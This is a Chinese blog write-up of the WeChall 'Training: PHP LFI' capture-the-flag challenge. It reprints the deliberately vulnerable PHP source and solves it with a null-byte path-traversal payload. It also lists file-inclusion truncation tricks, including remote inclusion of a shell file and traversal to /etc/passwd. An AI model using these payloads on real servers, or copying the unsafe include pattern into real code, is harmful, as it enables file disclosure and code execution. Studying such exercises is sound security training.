wechall php系列之Training: PHP LFI

最新推荐文章于 2023-03-07 11:56:51 发布
最新推荐文章于 2023-03-07 11:56:51 发布
阅读量1.9k 收藏 3
点赞数 1
分类专栏: web攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20307987/article/details/70879698
版权

原谅我直接贴代码–,我发现学习语言的最好方式是读别人的代码,然后自己查函数,用函数。

<?php
# Higlighter Plain
if (isset($_GET['show']) && $_GET['show'] === 'source')
{
        header('Content-Type: text/plain; charset=utf8;');
        echo file_get_contents('index.php');
        die();
}

# Change dir to web root
chdir('../../../../../');

# Print the website header
define('GWF_PAGE_TITLE', 'Local File Inclusion');
require_once('challenge/html_head.php');
if (false === ($chall = WC_Challenge::getByTitle('Training: PHP LFI'))) {
        $chall = WC_Challenge::dummyChallenge('Training: PHP LFI', 2, 'challenge/training/php/lfi/up/index.php', false);
}
$chall->showHeader();


# Highlighter BBCode
if (isset($_GET['highlight']) && $_GET['highlight'] === 'christmas')
{
        echo GWF_Message::display('[PHP]'.file_get_contents($_SERVER['SCRIPT_FILENAME']).'');
        require_once('challenge/html_foot.php');
        return;
}

###############################
### Here is your exploit :) ###
###############################
$code = '$filename = \'pages/\'.(isset($_GET["file"])?$_GET["file"]:"welcome").\'.html\';';
$code_emulate_pnb = '$filename = Common::substrUntil($filename, "\\0");'; # Emulate Poison Null Byte for PHP>=5.3.4
$code2 = 'include $filename;';
### End of exploit ###

# Show the mission box
$url = 'index.php?file=';
$ex = array('welcome', 'news', 'forums');
$showsrc1 = 'index.php?show=source';
$showsrc2 = 'index.php?highlight=christmas';
foreach ($ex as $i => $e) { $ex[$i] = htmlspecialchars($url.$e); }
echo GWF_Box::box($chall->lang('info', array(GWF_Message::display('[PHP]'.$code.PHP_EOL.$code2.''), '../solution.php', $showsrc1, $showsrc2, $ex[0], $ex[1], $ex[2])), $chall->lang('title'));

# Execute the code, using eval.
GWF_Debug::setDieOnError(false);
GWF_Debug::setMailOnError(false);
eval($code.$code_emulate_pnb); # eval the first line

echo '<div class="box">'.PHP_EOL;
echo '<div class="box_t">'.$chall->lang('example_title').' ('.htmlspecialchars($filename).')'.'</div>'.PHP_EOL;
echo '<div class="box_c">'.PHP_EOL;
if (lfiIsSafeDir($filename) === true) { eval($code2); } # Eval the second line, when safe.
else { echo GWF_HTML::error('LFI', $chall->lang('err_basedir'), false); }
echo '</div>'.PHP_EOL;
echo '</div>'.PHP_EOL;
GWF_Debug::setMailOnError(true);
GWF_Debug::setDieOnError(true);

# Show credits box
if (false !== ($minus = GWF_User::getByName('minus')))
{
        echo GWF_Box::box($chall->lang('credits', array($minus->displayProfileLink())));
}

# Show end of website
echo $chall->copyrightFooter();
require_once('challenge/html_foot.php');


### Safety first ###
function lfiIsSafeDir($filename)
{
        $valid = array(
                'pages',
                'pages/../..',
                'pages/..',
        );
        $d = dirname($filename);
        return in_array($d, $valid, true);
}
?>

其实可以分析一下,如果在源码中没有给出exploit的提示,让自己去审计,如何发现LFI的漏洞?

顺序看下来,chdir进入了根目录,包含了几个头文件,应该是这个题目必要的文件。然后就包含本地的其他文件,主要代码是:

$code = '$filename = \'pages/\'.(isset($_GET["file"])?$_GET["file"]:"welcome").\'.html\';';
$code_emulate_pnb = '$filename = Common::substrUntil($filename, "\\0");'; # Emulate Poison Null Byte for PHP>=5.3.4
$code2 = 'include $filename;';

随后用eval()函数执行了第一局和第二句代码

eval($code.$code_emulate_pnb);

继续看的话可以看到用htmlspecialchars函数对filename变量进行了转义,但是对这个道题目没有任何影响。继续看,发现了

if (lfiIsSafeDir($filename) === true) { eval($code2); } # Eval the second line, when safe.

用中国话讲,如果这个$filename是安全的,就执行包含的动作,那怎么是安全的呢?

function lfiIsSafeDir($filename)
{
        $valid = array(
                'pages',
                'pages/../..',
                'pages/..',
        );
        $d = dirname($filename);
        return in_array($d, $valid, true);
}
?>

可以看到,这个函数判断了,如果filename的路径中存在$vaild数组的一个,就返回true了,本来还想的怎么去添加这个路径,后来发现语句中自己给出来了–,真是为了做题而做题,哈哈
so?

index.php?file=../solution.php

然而发现貌似不可以,原来语句中默认在后面加了.html,所以要进行截断,这里使用%00截断,so?

index.php?file=../solution.php%00

还是不行,中间想了其他的办法,也没用,后来还是看别人的做的答案了[捂脸]
有点崩溃,原来是在上级目录
so!

index.php?file=../../solution.php%00

做题不是目的,还是要总结一下的:
 文件包含通常又有本地文件包含(Local File Inclusion)和远程文件包含(Remote File Inclusion)之分。
allow_url_fopen:本选项激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象例如文件。默认的封装协议提供用 ftp 和 http 协议来访问远程文件,一些扩展库例如 zlib 可能会注册更多的封装协议。

allow_url_fopen的配置范围是PHP_INI_SYSTEM,在 PHP <= 4.3.4 时是 PHP_INI_ALL。PHP 4.0.4 版以后可用。
Note:出于安全性考虑,此选项只能在 php.ini 中设置。
在php4.3.0之前,include,include_once, require,require_once 和GD 和图像处理 函数中的 imagecreatefromXXX 函数不支持远程文件访问。
在php4.3.0之后,引进了allow_url_include,要使用这个参数需要allow_url_fopen也开启。如果这两个选项都开启了,可能会有文件远程包含的漏洞。否则,可能会有本地包含漏洞。

(如果需要截断:
<1>在magic_quote_gpc为off的情况下,用%00
http://127.0.0.1/include.php?dir=shell.txt%00
<2>远程文件包含的时候,可以用?截断
http://127.0.0.1/include.php?dir=http://127.0.0.1/shell.txt?
http://127.0.0.1/include.php?dir=http://127.0.0.1/shell.txt%23
<3>通常Windows的截断长度为240,Linux的截断长度为4096。由于Windows和Linux的文件名都有一个最大路径长度(MAX_PATH)的限制,因此当提交文件名的长度超过了最大路劲长度限制是就会截断后面的内容,从而达到文件包含的效果。
<4>在magic_quote_gpc为Off的情况下,仅限windowns服务器可以用点号截断,比如:
http://127.0.0.1/include.php?dir=../../../../ect/passwd……………………………………………………………………[so many.]

这些都是基础的,还有用到伪协议(php://input 和 data:)的,忘不了的那次CTF!

%00截断
php版本要小于5.3.4,5.3.4及以上已经修复该问题

magic_quotes_gpc需要为OFF状态
R_1v3r
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php本地文件包含漏洞,本地文件包含漏洞详解---LFI
weixin_30668061的博客
03-09 1030
1概述文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。本地包含漏洞是PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server...
PHP-从LFI到RCE(上)
qq_50643984的博客
08-31 1618
利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfi到rce。...
Training: PHP LFI (Exploit, PHP, Training)
Howie‘s Blog
10-14 704
Training: PHP LFI (Exploit, PHP, Training) 题目描述 Your mission is to exploit this code, which has obviously an LFI vulnerability: 您的任务是利用此代码,它显然具有LFI漏洞: GeSHi`ed PHP code $filename = 'pages/'.(isset($...
文件包含LFI演化史
Jinmindong
03-07 445
LFI指本地文件包含(Local File Include),本次分享主要讲解PHP方向的LFI。include`requireTips:在PHP中include和require都不属于函数,而是流 程控制的一种,应该算是表达式。LFI主要用于配置类、工具类文件的包含,减少重复代码块。php// 包含配置文件?php?与上一段代码不同之处在于,这里,是对变量进行了包含,而变量是通过POST传参得到,属于用户可控的输入。比较常见的场景在于使用模板进行开发。
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
m0_65336233的博客
10-17 1308
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
PHP LFI(本地文件包含漏洞)
渗透测试
09-13 871
PHP LFI(本地文件包含漏洞) 与其相关的函数: include // 只在执行到此函数时才去包含文件,若包含的文件不存在产生警告,程序继续运行 include_once // 如果一个文件已经被包含过,则不会在包含它 require // 程序一运行文件便会包含进来,若包含文件不存在产生致命错误,程序终止运行 require_once // 如果一个文件已经被包含过,则不会在包含它 本题提示代码 $filename = 'pages/'.(isset($_GET["fi
toxin:LFI(本地文件包含)漏洞利用工具
05-30
Toxin 是一个 LFI(本地文件包含)/日志污染利用工具。 介绍 Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会...
k4l0ng_WAF:broute通过PHP使用AWD检测WAF
05-10
攻击流量attack_detect_log.txt记录的是waf检测到的攻击请求,waf会将详细的攻击向量记录在这个文件中,并在文件开头表明攻击类型(sqli,EXEC,LFI/RFI等)。抓取流量若AWD环境中没有权限部署流量拦截工具,可将此...
lfipwn:LFI扫描,漏洞利用工具
07-12
飞艇 LFI扫描,漏洞利用工具
Kadimus:LFI 扫描和利用工具
06-18
卡迪姆斯LFI 扫描和利用工具编译:安装 libcurl: CentOS/Fedora # yum install libcurl-devel 基于 Debian # apt-get install libcurl4-openssl-dev安装 libpcre: CentOS/Fedora # yum install libpcre-devel 基于...
finc:扫描利用lfi漏洞
04-03
芬奇利用python3编写的LFI的开发设置: git clone https://github.com/DSimsek000/finccd finc# recommended setup with virtualenvpython -m venv envsource env/bin/activatepip install -r requirements.txt句法...
[WeChall] Training: PHP LFI (Exploit, PHP,Tra..
滕青山博客
03-04 268
题目 [WeChall] Training: PHP LFI (Exploit, PHP, Training) Your mission is to exploit this code, which has obviously an LFI vulnerability: GeSHi`ed PHP code $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html'; include $filename;
[PHP]无需可控文件的LFI-RCE学习
feng的博客
01-05 2318
[PHP]无需可控文件的LFI-RCE学习 前言 昨天晚上P神的代码审计圈子里面提到了一个LFI的方法,题目来源是前段时间的HXPCTF中的题目includer's revenge。国外的一个师傅通过fuzz的方法通过iconv成功的将任意一个文件里的内容转换为一句话木马的方式,基本上可以说,PHPLFI可能就到此为止了。 今天参考陆队的文章:https://tttang.com/archive/1395/,来学习一下思路和攻击方式。确实不得不说,nb。 这篇文章就只是大概记录一下学习的思路了,水一点因为
lfi读取php,php LFIphp文件源码以及直接post webshell
weixin_29577613的博客
03-28 468
php LFIphp文件源码以及间接post 网站shell假如如下一个场景(1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包孕LFI漏洞)(2) 然而你不有中央能够upload你的网站shell代码(三) LFI只能读取到非php文件的源码(由于无奈解析履行 只能被爆菊花)(4) 假如你能读取到config.ph...
WeChall_Training: PHP LFI (Exploit, PHP, Training)
diaotan0836的博客
09-08 342
Your mission is to exploit this code, which has obviously anLFI vulnerability: GeSHi`ed PHP code 1 2 $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.htm...
WeChall_PHP-Local File Inclusion(LFI
1stPeak's Blog
09-16 505
PHP - Local File Inclusion(LFI) 题目: 中文翻译如下: 核心代码: $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html'; include $filename; 代码详解: 当要 判断一个变量是否已经声明的时候 可以使用 isset 函数 判断表达式是否成立?表...
Wechall PHP Writeup
Bendawang's Blog
03-19 6502
Wechall PHP Writeup
13.Wechall——Training: PHP LFI by Gizmore(得分2个)
qwsn
11-14 2024
0x01:题目 题目 题目地址链接 PHP LFI http://www.wechall.net/challenge/training/php/lfi/up/index.php 0x02:WP复现 1.分析提示: 提示一 1. $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';...
php LFI漏洞的一些收集
u011500307的专栏
06-08 3249
1. LFI全称是local file include,先举个最简单的例子来说明下:
index.php?file=show.php
最新发布
05-31
这是一个简单的 PHP 文件包含漏洞(LFI)示例,其中 file 参数指定了要包含的文件。 攻击者可以利用这个漏洞读取服务器上的敏感信息,例如包含密码的配置文件。攻击者可以通过修改 file 参数的值来访问其他敏感文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值